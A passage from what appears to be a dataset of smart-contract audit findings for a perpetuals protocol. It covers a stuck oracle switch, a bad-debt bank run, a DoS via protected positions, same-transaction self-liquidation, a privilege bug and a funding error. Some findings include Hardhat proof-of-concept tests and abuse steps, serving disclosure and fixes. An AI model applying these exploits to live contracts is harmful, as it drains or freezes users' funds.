pending.\\nThere is a brief transition period, when both the previous provider and a new provider are active. This is to ensure that all the requests made to the previous oracle are commited before switching to a new provider. This is handled by the `Oracle._handleLatest()` function, in particular the switch to a new provider occurs only when `Oracle.latestStale()` returns true. The lines of interest to us are:\\n```\\n uint256 latestTimestamp = global.latest == 0 ? 0 : oracles[global.latest].provider.latest().timestamp;\\n if (uint256(oracles[global.latest].timestamp) > latestTimestamp) return false;\\n```\\n\\n`latestTimestamp` - is the timestamp of last commited price for the previous provider `oracles[global.latest].timestamp` is the timestamp of the last requested price for the previous provider The switch doesn't occur, until last commited price is equal to or after the last request timestamp for the previous provider. 3. The functions to `commit` the price are in PythOracle: `commitRequested` and `commit`. 3.1. `commitRequested` requires publish timestamp of the pyth price to be within MIN_VALID_TIME_AFTER_VERSION..MAX_VALID_TIME_AFTER_VERSION from request time. It is possible that pyth price with signature in this time period is not available for different reasons (pyth price feed is down, keeper was down during this period and didn't collect price and signature):\\n```\\n uint256 versionToCommit = versionList[versionIndex];\\n PythStructs.Price memory pythPrice = _validateAndGetPrice(versionToCommit, updateData);\\n```\\n\\n`versionList` is an array of oracle request timestamps. And `_validateAndGetPrice()` filters the price within the interval specified (if it is not in the interval, it will revert):\\n```\\n return pyth.parsePriceFeedUpdates{value: pyth.getUpdateFee(updateDataList)}(\\n updateDataList,\\n idList,\\n SafeCast.toUint64(oracleVersion + MIN_VALID_TIME_AFTER_VERSION),\\n SafeCast.toUint64(oracleVersion + MAX_VALID_TIME_AFTER_VERSION)\\n )[0].price;\\n```\\n\\n3.2. `commit` can not be done with timestamp older than the first oracle request timestamp: if any oracle request is still active, it will simply redirect to commitRequested:\\n```\\n if (versionList.length > nextVersionIndexToCommit && oracleVersion >= versionList[nextVersionIndexToCommit]) {\\n commitRequested(nextVersionIndexToCommit, updateData);\\n return;\\n }\\n```\\n\\nAll new oracle requests are directed to a new provider, this means that previous provider can not receive any new requests (which allows to finalize it):\\n```\\n function request(address account) external onlyAuthorized {\\n (OracleVersion memory latestVersion, uint256 currentTimestamp) = oracles[global.current].provider.status();\\n\\n oracles[global.current].provider.request(account);\\n oracles[global.current].timestamp = uint96(currentTimestamp);\\n _updateLatest(latestVersion);\\n }\\n```\\n\\nSo the following scenario is possible: timestamp=69: oracle price is commited for timestamp=50 timestamp=70: user requests to open position (Oracle.request() is made) timestamp=80: owner calls `Oracle.update()` timestamp=81: pyth price signing service goes offline (or keeper goes offline) ... timestamp=120: signing service goes online again. timestamp=121: another user requests to open position (Oracle.request() is made, directed to new provider) timestamp=200: new provider's price is commited (commitRequested is called with timestamp=121)\\nAt this time, `Oracle.latest()` will return price at timestamp=50. It will ignore new provider's latest commit, because previous provider last request (timestamp=70) is still not commited. Any new price requests and commits to a new provider will be ignored, but the previous provider can not be commited due to absence of prices in the valid time range. It is also not possible to change oracle for the market, because there is no such function. It is also impossible to cancel provider update and impossible to change the provider back to previous one, as all of these will revert.\\nIt is still possible for the owner to manually whitelist some address to call `request()` for the previous provider. However, this situation provides even worse result. While the latest version for the previous provider will now be later than the last request, so it will let the oracle switch to new provider, however `oracle.status()` will briefly return invalid oracle version, because it will return oracle version at the timestamp = last request before the provider switch, which will be invalid (the new request will be after that timestamp):\\nThis can be abused by some user who can backrun the previous provider oracle commit (or commit himself) and use the invalid oracle returned by `status()` (oracle version with price = 0). Market doesn't expect the oracle status to return invalid price (it is expected to be always valid), so it will use this invalid price as if it's a normal price = 0, which will totally break the market:\\nSo if the oracle provider switch becomes stuck, there is no way out and the market will become stale, not allowing any user to withdraw the funds.чThere are multiple possible ways to fix this. For example, allow to finalize previous provider if the latest `commit` from the new provider is newer than the latest `commit` from the previous provider by `GRACE_PERIOD` seconds. Or allow PythOracle to `commit` directly (instead of via commitRequested) if the `commit` oracleVersion is newer than the last request by `GRACE_PERIOD` seconds.чIssue During oracle provider switch, if it is impossible to commit the last request of previous provider, then the oracle will get stuck (no price updates) without any possibility to fix it\\nSwitching oracle provider can make the oracle stuck and stop updating new prices. This will mean the market will become stale and will revert on all requests from user, disallowing to withdraw funds, bricking the contract entirely.ч```\\n uint256 latestTimestamp = global.latest == 0 ? 0 : oracles[global.latest].provider.latest().timestamp;\\n if (uint256(oracles[global.latest].timestamp) > latestTimestamp) return false;\\n```\\n -Bad debt (shortfall) liquidation leaves liquidated user in a negative collateral balance which can cause bank run and loss of funds for the last users to withdrawчmediumчConsider the following scenario:\\nUser1 and User2 are the only makers in the market each with maker=50 position and each with collateral=500. (price=$100)\\nA new user comes into the market and opens long=10 position with collateral=10.\\nPrice drops to $90. Some liquidator liquidates the user, taking $10 liquidation fee. User is now left with the negative collateral = -$100\\nSince User1 and User2 were the other party for the user, each of them has a profit of $50 (both users have collateral=550)\\nAt this point protocol has total funds from deposit of User1($500) + User2($500) + new user($10) - liquidator($10) = $1000. However, User1 and User2 have total collateral of 1100.\\nUser1 closes position and withdraws $550. This succeeds. Protocol now has only $450 funds remaining and 550 collateral owed to User2.\\nUser2 closes position and tries to withdraw $550, but fails, because protocol doesn't have enough funds. User2 can only withdraw $450, effectively losing $100.\\nSince all users know about this feature, after bad debt they will race to be the first to withdraw, triggering a bank run.\\nThe scenario above is demonstrated in the test, add this to test/unit/market/Market.test.ts:\\n```\\nit('panprog bad debt liquidation bankrun', async () => {\\n\\n function setupOracle(price: string, timestamp : number, nextTimestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, nextTimestamp])\\n oracle.request.returns()\\n }\\n\\n var riskParameter = {\\n maintenance: parse6decimal('0.01'),\\n takerFee: parse6decimal('0.00'),\\n takerSkewFee: 0,\\n takerImpactFee: 0,\\n makerFee: parse6decimal('0.00'),\\n makerImpactFee: 0,\\n makerLimit: parse6decimal('1000'),\\n efficiencyLimit: parse6decimal('0.2'),\\n liquidationFee: parse6decimal('0.50'),\\n minLiquidationFee: parse6decimal('10'),\\n maxLiquidationFee: parse6decimal('1000'),\\n utilizationCurve: {\\n minRate: parse6decimal('0.0'),\\n maxRate: parse6decimal('1.00'),\\n targetRate: parse6decimal('0.10'),\\n targetUtilization: parse6decimal('0.50'),\\n },\\n pController: {\\n k: parse6decimal('40000'),\\n max: parse6decimal('1.20'),\\n },\\n minMaintenance: parse6decimal('10'),\\n virtualTaker: parse6decimal('0'),\\n staleAfter: 14400,\\n makerReceiveOnly: false,\\n }\\n var marketParameter = {\\n fundingFee: parse6decimal('0.0'),\\n interestFee: parse6decimal('0.0'),\\n oracleFee: parse6decimal('0.0'),\\n riskFee: parse6decimal('0.0'),\\n positionFee: parse6decimal('0.0'),\\n maxPendingGlobal: 5,\\n maxPendingLocal: 3,\\n settlementFee: parse6decimal('0'),\\n makerRewardRate: parse6decimal('0'),\\n longRewardRate: parse6decimal('0'),\\n shortRewardRate: parse6decimal('0'),\\n makerCloseAlways: false,\\n takerCloseAlways: false,\\n closed: false,\\n }\\n \\n await market.connect(owner).updateRiskParameter(riskParameter);\\n await market.connect(owner).updateParameter(marketParameter);\\n\\n setupOracle('100', TIMESTAMP, TIMESTAMP + 100);\\n\\n var collateral = parse6decimal('500')\\n dsu.transferFrom.whenCalledWith(userB.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userB).update(userB.address, parse6decimal('50.000'), 0, 0, collateral, false)\\n dsu.transferFrom.whenCalledWith(userC.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userC).update(userC.address, parse6decimal('50.000'), 0, 0, collateral, false)\\n\\n var collateral = parse6decimal('10')\\n dsu.transferFrom.whenCalledWith(user.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(user).update(user.address, 0, parse6decimal('10.000'), 0, collateral, false)\\n\\n var info = await market.locals(user.address);\\n var infoB = await market.locals(userB.address);\\n var infoC = await market.locals(userC.address);\\n console.log(\"collateral before liquidation: \" + info.collateral + \" + \" + infoB.collateral + \" + \" + infoC.collateral + \" = \" + \\n info.collateral.add(infoB.collateral).add(infoC.collateral));\\n\\n setupOracle('100', TIMESTAMP + 100, TIMESTAMP + 200);\\n setupOracle('90', TIMESTAMP + 200, TIMESTAMP + 300);\\n // liquidate\\n const EXPECTED_LIQUIDATION_FEE = parse6decimal('10')\\n dsu.transfer.whenCalledWith(liquidator.address, EXPECTED_LIQUIDATION_FEE.mul(1e12)).returns(true)\\n dsu.balanceOf.whenCalledWith(market.address).returns(COLLATERAL.mul(1e12))\\n await market.connect(liquidator).update(user.address, 0, 0, 0, EXPECTED_LIQUIDATION_FEE.mul(-1), true)\\n\\n setupOracle('90', TIMESTAMP + 200, TIMESTAMP + 300);\\n await market.connect(userB).update(userB.address, 0, 0, 0, 0, false)\\n await market.connect(userC).update(userC.address, 0, 0, 0, 0, false)\\n\\n var info = await market.locals(user.address);\\n var infoB = await market.locals(userB.address);\\n var infoC = await market.locals(userC.address);\\n console.log(\"collateral after liquidation: \" + info.collateral + \" + \" + infoB.collateral + \" + \" + infoC.collateral + \" = \" + \\n info.collateral.add(infoB.collateral).add(infoC.collateral));\\n})\\n```\\n\\nConsole output for the code:\\n```\\ncollateral before liquidation: 10000000 + 500000000 + 500000000 = 1010000000\\ncollateral after liquidation: -100000080 + 550000000 + 550000000 = 999999920\\n```\\n\\nAfter initial total deposit of $1010, in the end liquidated user will just abandon his account, and remaining user accounts have $550+$550=$1100 but only $1000 funds in the protocol to withdraw.чThere should be no negative collateral accounts with 0-position and no incentive to cover shortfall. When liquidated, if account is left with negative collateral, the bad debt should be added to the opposite position pnl (long position bad debt should be socialized between short position holders) or maybe to makers pnl only (socialized between makers). The account will have to be left with collateral = 0.\\nImplementation details for such solution can be tricky due to settlement in the future (pnl is not known at the time of liquidation initiation). Possibly a 2nd step of bad debt liquidation should be added: a keeper will call the user account to socialize bad debt and get some reward for this. Although this is not the best solution, because users who close their positions before the keeper socializes the bad debt, will be able to avoid this social loss. One of the solutions for this will be to introduce delayed withdrawals and delayed socialization (like withdrawals are allowed only after 5 oracle versions and socialization is applied to all positions opened before socialization and still active or closed within 5 last oracle versions), but it will make protocol much more complicated.чAfter ANY bad debt, the protocol collateral for all non-negative users will be higher than protocol funds available, which can cause a bank run and a loss of funds for the users who are the last to withdraw.\\nEven if someone covers the shortfall for the user with negative collateral, this doesn't guarantee absence of bank run:\\nIf the shortfall is not covered quickly for any reason, the other users can notice disparency between collateral and funds in the protocol and start to withdraw\\nIt is possible that bad debt is so high that any entity (\"insurance fund\") just won't have enough funds to cover it.ч```\\nit('panprog bad debt liquidation bankrun', async () => {\\n\\n function setupOracle(price: string, timestamp : number, nextTimestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, nextTimestamp])\\n oracle.request.returns()\\n }\\n\\n var riskParameter = {\\n maintenance: parse6decimal('0.01'),\\n takerFee: parse6decimal('0.00'),\\n takerSkewFee: 0,\\n takerImpactFee: 0,\\n makerFee: parse6decimal('0.00'),\\n makerImpactFee: 0,\\n makerLimit: parse6decimal('1000'),\\n efficiencyLimit: parse6decimal('0.2'),\\n liquidationFee: parse6decimal('0.50'),\\n minLiquidationFee: parse6decimal('10'),\\n maxLiquidationFee: parse6decimal('1000'),\\n utilizationCurve: {\\n minRate: parse6decimal('0.0'),\\n maxRate: parse6decimal('1.00'),\\n targetRate: parse6decimal('0.10'),\\n targetUtilization: parse6decimal('0.50'),\\n },\\n pController: {\\n k: parse6decimal('40000'),\\n max: parse6decimal('1.20'),\\n },\\n minMaintenance: parse6decimal('10'),\\n virtualTaker: parse6decimal('0'),\\n staleAfter: 14400,\\n makerReceiveOnly: false,\\n }\\n var marketParameter = {\\n fundingFee: parse6decimal('0.0'),\\n interestFee: parse6decimal('0.0'),\\n oracleFee: parse6decimal('0.0'),\\n riskFee: parse6decimal('0.0'),\\n positionFee: parse6decimal('0.0'),\\n maxPendingGlobal: 5,\\n maxPendingLocal: 3,\\n settlementFee: parse6decimal('0'),\\n makerRewardRate: parse6decimal('0'),\\n longRewardRate: parse6decimal('0'),\\n shortRewardRate: parse6decimal('0'),\\n makerCloseAlways: false,\\n takerCloseAlways: false,\\n closed: false,\\n }\\n \\n await market.connect(owner).updateRiskParameter(riskParameter);\\n await market.connect(owner).updateParameter(marketParameter);\\n\\n setupOracle('100', TIMESTAMP, TIMESTAMP + 100);\\n\\n var collateral = parse6decimal('500')\\n dsu.transferFrom.whenCalledWith(userB.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userB).update(userB.address, parse6decimal('50.000'), 0, 0, collateral, false)\\n dsu.transferFrom.whenCalledWith(userC.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userC).update(userC.address, parse6decimal('50.000'), 0, 0, collateral, false)\\n\\n var collateral = parse6decimal('10')\\n dsu.transferFrom.whenCalledWith(user.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(user).update(user.address, 0, parse6decimal('10.000'), 0, collateral, false)\\n\\n var info = await market.locals(user.address);\\n var infoB = await market.locals(userB.address);\\n var infoC = await market.locals(userC.address);\\n console.log(\"collateral before liquidation: \" + info.collateral + \" + \" + infoB.collateral + \" + \" + infoC.collateral + \" = \" + \\n info.collateral.add(infoB.collateral).add(infoC.collateral));\\n\\n setupOracle('100', TIMESTAMP + 100, TIMESTAMP + 200);\\n setupOracle('90', TIMESTAMP + 200, TIMESTAMP + 300);\\n // liquidate\\n const EXPECTED_LIQUIDATION_FEE = parse6decimal('10')\\n dsu.transfer.whenCalledWith(liquidator.address, EXPECTED_LIQUIDATION_FEE.mul(1e12)).returns(true)\\n dsu.balanceOf.whenCalledWith(market.address).returns(COLLATERAL.mul(1e12))\\n await market.connect(liquidator).update(user.address, 0, 0, 0, EXPECTED_LIQUIDATION_FEE.mul(-1), true)\\n\\n setupOracle('90', TIMESTAMP + 200, TIMESTAMP + 300);\\n await market.connect(userB).update(userB.address, 0, 0, 0, 0, false)\\n await market.connect(userC).update(userC.address, 0, 0, 0, 0, false)\\n\\n var info = await market.locals(user.address);\\n var infoB = await market.locals(userB.address);\\n var infoC = await market.locals(userC.address);\\n console.log(\"collateral after liquidation: \" + info.collateral + \" + \" + infoB.collateral + \" + \" + infoC.collateral + \" = \" + \\n info.collateral.add(infoB.collateral).add(infoC.collateral));\\n})\\n```\\n -Market: DoS when stuffed with pending protected positionsчmediumчIn `_invariant`, there is a limit on the number of pending position updates. But for `protected` position updates, `_invariant` returns early and does not trigger this check.\\n```\\n function _invariant(\\n Context memory context,\\n address account,\\n Order memory newOrder,\\n Fixed6 collateral,\\n bool protected\\n ) private view {\\n // rest of code.\\n\\n if (protected) return; // The following invariants do not apply to protected position updates (liquidations)\\n // rest of code.\\n if (\\n context.global.currentId > context.global.latestId + context.marketParameter.maxPendingGlobal ||\\n context.local.currentId > context.local.latestId + context.marketParameter.maxPendingLocal\\n ) revert MarketExceedsPendingIdLimitError();\\n // rest of code.\\n }\\n```\\n\\nAfter the `_invariant` check, the postion updates will be added into pending position queues.\\n```\\n _invariant(context, account, newOrder, collateral, protected);\\n\\n // store\\n _pendingPosition[context.global.currentId].store(context.currentPosition.global);\\n _pendingPositions[account][context.local.currentId].store(context.currentPosition.local);\\n```\\n\\nWhen the protocol enters next oracle version, the global pending queue `_pendingPosition` will be settled in a loop.\\n```\\n function _settle(Context memory context, address account) private {\\n // rest of code.\\n // settle\\n while (\\n context.global.currentId != context.global.latestId &&\\n (nextPosition = _pendingPosition[context.global.latestId + 1].read()).ready(context.latestVersion)\\n ) _processPositionGlobal(context, context.global.latestId + 1, nextPosition);\\n```\\n\\nThe OOG revert happens if there are too many pending position updates.\\nThis revert will happend on every `update` calls because they all need to settle this `_pendingPosition` before `update`.\\n```\\n function update(\\n address account,\\n UFixed6 newMaker,\\n UFixed6 newLong,\\n UFixed6 newShort,\\n Fixed6 collateral,\\n bool protect\\n ) external nonReentrant whenNotPaused {\\n Context memory context = _loadContext(account);\\n _settle(context, account);\\n _update(context, account, newMaker, newLong, newShort, collateral, protect);\\n _saveContext(context, account);\\n }\\n```\\nчEither or both,\\nLimit the number of pending protected position updates can be queued in `_invariant`.\\nLimit the number of global pending protected postions can be settled in `_settle`.чThe protocol will be fully unfunctional and funds will be locked. There will be no recover to this DoS.\\nA malicious user can tigger this intentionally at very low cost. Alternatively, this can occur during a volatile market period when there are massive liquidations.ч```\\n function _invariant(\\n Context memory context,\\n address account,\\n Order memory newOrder,\\n Fixed6 collateral,\\n bool protected\\n ) private view {\\n // rest of code.\\n\\n if (protected) return; // The following invariants do not apply to protected position updates (liquidations)\\n // rest of code.\\n if (\\n context.global.currentId > context.global.latestId + context.marketParameter.maxPendingGlobal ||\\n context.local.currentId > context.local.latestId + context.marketParameter.maxPendingLocal\\n ) revert MarketExceedsPendingIdLimitError();\\n // rest of code.\\n }\\n```\\n -It is possible to open and liquidate your own position in 1 transaction to overcome efficiency and liquidity removal limits at almost no costчmediumчThe user can liquidate his own position with 100% guarantee in 1 transaction by following these steps:\\nIt can be done on existing position or on a new position\\nRecord Pyth oracle prices with signatures until you encounter a price which is higher (or lower, depending on your position direction) than latest oracle version price by any amount.\\nIn 1 transaction do the following: 3.1. Make the position you want to liquidate at exactly the edge of liquidation: withdraw maximum allowed amount or open a new position with minimum allowed collateral 3.2. Commit non-requested oracle version with the price recorded earlier (this price makes the position liquidatable) 3.3. Liquidate your position (it will be allowed, because the position generates a minimum loss due to price change and becomes liquidatable)\\nSince all liquidation fee is given to user himself, liquidation of own position is almost free for the user (only the keeper and position open/close fee is paid if any).\\nThe scenario of liquidating unsuspecting user is demonstrated in the test, add this to test/unit/market/Market.test.ts:\\n```\\nit('panprog liquidate unsuspecting user / self in 1 transaction', async () => {\\n\\n function setupOracle(price: string, timestamp : number, nextTimestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, nextTimestamp])\\n oracle.request.returns()\\n }\\n\\n var riskParameter = {\\n maintenance: parse6decimal('0.2'),\\n takerFee: parse6decimal('0.00'),\\n takerSkewFee: 0,\\n takerImpactFee: 0,\\n makerFee: parse6decimal('0.00'),\\n makerImpactFee: 0,\\n makerLimit: parse6decimal('1000'),\\n efficiencyLimit: parse6decimal('0.2'),\\n liquidationFee: parse6decimal('0.50'),\\n minLiquidationFee: parse6decimal('10'),\\n maxLiquidationFee: parse6decimal('1000'),\\n utilizationCurve: {\\n minRate: parse6decimal('0.0'),\\n maxRate: parse6decimal('1.00'),\\n targetRate: parse6decimal('0.10'),\\n targetUtilization: parse6decimal('0.50'),\\n },\\n pController: {\\n k: parse6decimal('40000'),\\n max: parse6decimal('1.20'),\\n },\\n minMaintenance: parse6decimal('10'),\\n virtualTaker: parse6decimal('0'),\\n staleAfter: 14400,\\n makerReceiveOnly: false,\\n }\\n var marketParameter = {\\n fundingFee: parse6decimal('0.0'),\\n interestFee: parse6decimal('0.0'),\\n oracleFee: parse6decimal('0.0'),\\n riskFee: parse6decimal('0.0'),\\n positionFee: parse6decimal('0.0'),\\n maxPendingGlobal: 5,\\n maxPendingLocal: 3,\\n settlementFee: parse6decimal('0'),\\n makerRewardRate: parse6decimal('0'),\\n longRewardRate: parse6decimal('0'),\\n shortRewardRate: parse6decimal('0'),\\n makerCloseAlways: false,\\n takerCloseAlways: false,\\n closed: false,\\n }\\n \\n await market.connect(owner).updateRiskParameter(riskParameter);\\n await market.connect(owner).updateParameter(marketParameter);\\n\\n setupOracle('100', TIMESTAMP, TIMESTAMP + 100);\\n\\n var collateral = parse6decimal('1000')\\n dsu.transferFrom.whenCalledWith(userB.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userB).update(userB.address, parse6decimal('10.000'), 0, 0, collateral, false)\\n\\n var collateral = parse6decimal('100')\\n dsu.transferFrom.whenCalledWith(user.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(user).update(user.address, 0, parse6decimal('1.000'), 0, collateral, false)\\n\\n // settle\\n setupOracle('100', TIMESTAMP + 100, TIMESTAMP + 200);\\n await market.connect(userB).update(userB.address, parse6decimal('10.000'), 0, 0, 0, false)\\n await market.connect(user).update(user.address, 0, parse6decimal('1.000'), 0, 0, false)\\n\\n // withdraw\\n var collateral = parse6decimal('800')\\n dsu.transfer.whenCalledWith(userB.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userB).update(userB.address, parse6decimal('2.000'), 0, 0, collateral.mul(-1), false)\\n\\n // liquidate unsuspecting user\\n setupOracle('100.01', TIMESTAMP + 150, TIMESTAMP + 200);\\n const EXPECTED_LIQUIDATION_FEE = parse6decimal('100.01')\\n dsu.transfer.whenCalledWith(liquidator.address, EXPECTED_LIQUIDATION_FEE.mul(1e12)).returns(true)\\n dsu.balanceOf.whenCalledWith(market.address).returns(COLLATERAL.mul(1e12))\\n await market.connect(liquidator).update(userB.address, 0, 0, 0, EXPECTED_LIQUIDATION_FEE.mul(-1), true)\\n\\n setupOracle('100.01', TIMESTAMP + 200, TIMESTAMP + 300);\\n await market.connect(userB).update(userB.address, 0, 0, 0, 0, false)\\n\\n var info = await market.locals(userB.address);\\n var pos = await market.positions(userB.address);\\n console.log(\"Liquidated maker: collateral = \" + info.collateral + \" maker = \" + pos.maker);\\n\\n})\\n```\\n\\nConsole output for the code:\\n```\\nLiquidated maker: collateral = 99980000 maker = 0\\n```\\n\\nSelf liquidation is the same, just the liquidator does this in 1 transaction and is owned by userB.чIndustry standard is to have initial margin (margin required to open position or withdraw collateral) and maintenance margin (margin required to keep the position solvent). Initial margin > maintenance margin and serves exactly for the reason to prevent users from being close to liquidation, intentional or not. I suggest to implement initial margin as a measure to prevent such self liquidation or unsuspected user liquidations. This will improve user experience (remove a lot of surprise liquidations) and will also improve security by disallowing intentional liquidations and cheaply overcoming the protocol limits such as efficiency limit: intentional liquidations are never good for the protocol as they're most often malicious, so having the ability to liquidate yourself in 1 transaction should definetely be prohibited.чThere are different malicious actions scenarios possible which can abuse this issue and overcome efficiency and liquidity removal limitations (as they're ignored when liquidating positions), such as:\\nOpen large maker and long or short position, then liquidate maker to cause mismatch between long/short and maker (socialize positions). This will cause some chaos in the market, disbalance between long and short profit/loss and users will probably start leaving such chaotic market, so while this attack is not totally free, it's cheap enough to drive users away from competition.\\nOpen large maker, wait for long and/or short positions from normal users to accumulate, then liquidate most of the large maker position, which will drive taker interest very high and remaining small maker position will be able to accumulate big profit with a small risk.\\nJust open long/short position from different accounts and wait for the large price update and frontrun it by withdrawing max collateral from the position which will be in a loss, and immediately liquidate it in the same transaction: with large price update one position will be liquidated with bad debt while the other position will be in a large profit, total profit from both positions will be positive and basically risk-free, meaning it's at the expense of the other users. While this strategy is possible to do on its own, liquidation in the same transaction allows it to be more profitable and catch more opportunities, meaning more damage to the other protocol users.\\nThe same core reason can also cause unsuspecting user to be unexpectedly liquidated in the following scenario:\\nUser opens position (10 ETH long at $1000, with $10000 collateral). User is choosing very safe leverage = 1. Market maintenance is set to 20% (max leverage = 5)\\nSome time later the price is still $1000 and user decides to close most of his position and withdraw collateral, so he reduces his position to 2 ETH long and withdraws $8000 collateral, leaving his position with $2000 collateral. It appears that the user is at the safe leverage = 1 again.\\nRight in the same block the liquidator commits non-requested oracle with a price $999.999 and immediately liquidates the user.\\nThe user is unsuspectedly liquidated even though he thought that he was at leverage = 1. But since collateral is withdrawn immediately, but position changes only later, user actually brought his position to max leverage and got liquidated. While this might be argued to be the expected behavior, it might still be hard to understand and unintuitive for many users, so it's better to prevent such situation from happening and the fix is the same as the one to fix self-liquidations.ч```\\nit('panprog liquidate unsuspecting user / self in 1 transaction', async () => {\\n\\n function setupOracle(price: string, timestamp : number, nextTimestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, nextTimestamp])\\n oracle.request.returns()\\n }\\n\\n var riskParameter = {\\n maintenance: parse6decimal('0.2'),\\n takerFee: parse6decimal('0.00'),\\n takerSkewFee: 0,\\n takerImpactFee: 0,\\n makerFee: parse6decimal('0.00'),\\n makerImpactFee: 0,\\n makerLimit: parse6decimal('1000'),\\n efficiencyLimit: parse6decimal('0.2'),\\n liquidationFee: parse6decimal('0.50'),\\n minLiquidationFee: parse6decimal('10'),\\n maxLiquidationFee: parse6decimal('1000'),\\n utilizationCurve: {\\n minRate: parse6decimal('0.0'),\\n maxRate: parse6decimal('1.00'),\\n targetRate: parse6decimal('0.10'),\\n targetUtilization: parse6decimal('0.50'),\\n },\\n pController: {\\n k: parse6decimal('40000'),\\n max: parse6decimal('1.20'),\\n },\\n minMaintenance: parse6decimal('10'),\\n virtualTaker: parse6decimal('0'),\\n staleAfter: 14400,\\n makerReceiveOnly: false,\\n }\\n var marketParameter = {\\n fundingFee: parse6decimal('0.0'),\\n interestFee: parse6decimal('0.0'),\\n oracleFee: parse6decimal('0.0'),\\n riskFee: parse6decimal('0.0'),\\n positionFee: parse6decimal('0.0'),\\n maxPendingGlobal: 5,\\n maxPendingLocal: 3,\\n settlementFee: parse6decimal('0'),\\n makerRewardRate: parse6decimal('0'),\\n longRewardRate: parse6decimal('0'),\\n shortRewardRate: parse6decimal('0'),\\n makerCloseAlways: false,\\n takerCloseAlways: false,\\n closed: false,\\n }\\n \\n await market.connect(owner).updateRiskParameter(riskParameter);\\n await market.connect(owner).updateParameter(marketParameter);\\n\\n setupOracle('100', TIMESTAMP, TIMESTAMP + 100);\\n\\n var collateral = parse6decimal('1000')\\n dsu.transferFrom.whenCalledWith(userB.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userB).update(userB.address, parse6decimal('10.000'), 0, 0, collateral, false)\\n\\n var collateral = parse6decimal('100')\\n dsu.transferFrom.whenCalledWith(user.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(user).update(user.address, 0, parse6decimal('1.000'), 0, collateral, false)\\n\\n // settle\\n setupOracle('100', TIMESTAMP + 100, TIMESTAMP + 200);\\n await market.connect(userB).update(userB.address, parse6decimal('10.000'), 0, 0, 0, false)\\n await market.connect(user).update(user.address, 0, parse6decimal('1.000'), 0, 0, false)\\n\\n // withdraw\\n var collateral = parse6decimal('800')\\n dsu.transfer.whenCalledWith(userB.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userB).update(userB.address, parse6decimal('2.000'), 0, 0, collateral.mul(-1), false)\\n\\n // liquidate unsuspecting user\\n setupOracle('100.01', TIMESTAMP + 150, TIMESTAMP + 200);\\n const EXPECTED_LIQUIDATION_FEE = parse6decimal('100.01')\\n dsu.transfer.whenCalledWith(liquidator.address, EXPECTED_LIQUIDATION_FEE.mul(1e12)).returns(true)\\n dsu.balanceOf.whenCalledWith(market.address).returns(COLLATERAL.mul(1e12))\\n await market.connect(liquidator).update(userB.address, 0, 0, 0, EXPECTED_LIQUIDATION_FEE.mul(-1), true)\\n\\n setupOracle('100.01', TIMESTAMP + 200, TIMESTAMP + 300);\\n await market.connect(userB).update(userB.address, 0, 0, 0, 0, false)\\n\\n var info = await market.locals(userB.address);\\n var pos = await market.positions(userB.address);\\n console.log(\"Liquidated maker: collateral = \" + info.collateral + \" maker = \" + pos.maker);\\n\\n})\\n```\\n -update() wrong privilege controlчmediumчin `OracleFactory.update()` will call `oracle.update()`\\n```\\ncontract OracleFactory is IOracleFactory, Factory {\\n// rest of code\\n function update(bytes32 id, IOracleProviderFactory factory) external onlyOwner {\\n if (!factories[factory]) revert OracleFactoryNotRegisteredError();\\n if (oracles[id] == IOracleProvider(address(0))) revert OracleFactoryNotCreatedError();\\n\\n IOracleProvider oracleProvider = factory.oracles(id);\\n if (oracleProvider == IOracleProvider(address(0))) revert OracleFactoryInvalidIdError();\\n\\n IOracle oracle = IOracle(address(oracles[id]));\\n oracle.update(oracleProvider);\\n }\\n```\\n\\nBut `oracle.update()` permission is needed for `OracleFactory.owner()` and not `OracleFactory` itself.\\n```\\n function update(IOracleProvider newProvider) external onlyOwner {\\n _updateCurrent(newProvider);\\n _updateLatest(newProvider.latest());\\n }\\n\\n modifier onlyOwner {\\n if (msg.sender != factory().owner()) revert InstanceNotOwnerError(msg.sender);\\n _;\\n }\\n```\\n\\nThis results in `OracleFactory` not being able to do `update()`. Suggest changing the limit of `oracle.update()` to `factory()`.ч```\\ncontract Oracle is IOracle, Instance {\\n// rest of code\\n\\n- function update(IOracleProvider newProvider) external onlyOwner {\\n+ function update(IOracleProvider newProvider) external {\\n+ require(msg.sender == factory(),\"invalid sender\");\\n _updateCurrent(newProvider);\\n _updateLatest(newProvider.latest());\\n }\\n```\\nч`OracleFactory.update()` unable to add `IOracleProvider`ч```\\ncontract OracleFactory is IOracleFactory, Factory {\\n// rest of code\\n function update(bytes32 id, IOracleProviderFactory factory) external onlyOwner {\\n if (!factories[factory]) revert OracleFactoryNotRegisteredError();\\n if (oracles[id] == IOracleProvider(address(0))) revert OracleFactoryNotCreatedError();\\n\\n IOracleProvider oracleProvider = factory.oracles(id);\\n if (oracleProvider == IOracleProvider(address(0))) revert OracleFactoryInvalidIdError();\\n\\n IOracle oracle = IOracle(address(oracles[id]));\\n oracle.update(oracleProvider);\\n }\\n```\\n -`_accumulateFunding()` maker will get the wrong amount of funding fee.чmediumчThe formula that calculates the amount of funding in `Version#_accumulateFunding()` on the maker side is incorrect. This leads to an incorrect distribution of funding between the minor and the maker's 